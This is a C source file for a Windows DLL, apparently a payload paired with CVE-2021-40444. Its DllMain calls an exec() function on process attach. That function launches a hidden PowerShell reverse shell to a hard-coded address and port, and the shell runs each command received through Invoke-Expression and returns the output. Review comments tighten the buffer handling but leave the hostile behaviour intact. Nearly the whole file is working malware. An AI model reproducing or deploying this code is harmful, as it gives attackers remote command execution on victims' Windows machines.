CVE-2021-40444 Backdoor/Shell — a DLL whose DllMain, on process attach, runs a PowerShell reverse shell to a hard-coded address and port (10.10.10.10:9001).
#include <windows.h>
#include <stdio.h>
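/* Builds a PowerShell reverse-shell command line and hands it to system().
 *
 * The callback address and port are hard-coded locals below.  The PowerShell
 * script connects with Net.Sockets.TCPClient, prints a "SHELL> " prompt,
 * then loops: read a line from the socket, drop its trailing byte, run it
 * through Invoke-Expression, and write the output (or the error) back.
 *
 * Called from DllMain on DLL_PROCESS_ATTACH (see below), so it executes while
 * the loader holds its lock.  NOTE(review): the DllMain guidance advises
 * against creating processes from DllMain; this PoC relies on it working
 * in practice.
 *
 * No return value.  If the formatted command does not fit in the buffer it is
 * NOT executed: the original used sprintf() into a 680-byte buffer with a
 * format string of roughly 660 bytes, so a longer address or port would have
 * overflowed the stack buffer, and a silently truncated command must never be
 * passed to system().
 */
void exec(void) {
    /* Headroom over the ~670 bytes actually needed; snprintf below bounds it anyway. */
    char payload[1024];
    const char addr[] = "10.10.10.10";
    const int port = 9001;

    /* snprintf, not sprintf: bounded by sizeof(payload); the runtime string is
     * kept byte-for-byte identical to the original. */
    int written = snprintf(payload, sizeof(payload), "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('%s', %d);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"", addr, port);

    /* Encoding error, or command longer than the buffer (would have been
     * truncated): refuse to run a partial command line. */
    if (written < 0 || (size_t)written >= sizeof(payload)) {
        return;
    }

    system(payload);
}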
/* DLL entry point.
 *
 * The only reason this DLL exists is the process-attach path: the first time
 * it is mapped into a process, exec() is called and spawns the reverse shell.
 * Thread attach/detach and process detach do nothing.  Always reports success
 * to the loader, so the load never fails on account of this callback.
 *
 * hinstDLL and lpReserved are not used.
 *
 * NOTE(review): exec() ends up calling system() from inside DllMain, i.e.
 * while the loader lock is held; the DllMain guidance advises against
 * creating processes here — confirm this is acceptable for the intended use.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    (void)hinstDLL;
    (void)lpReserved;

    /* Only process attach does anything; every other reason is a no-op. */
    if (fdwReason == DLL_PROCESS_ATTACH) {
        exec();
    }

    return TRUE;
}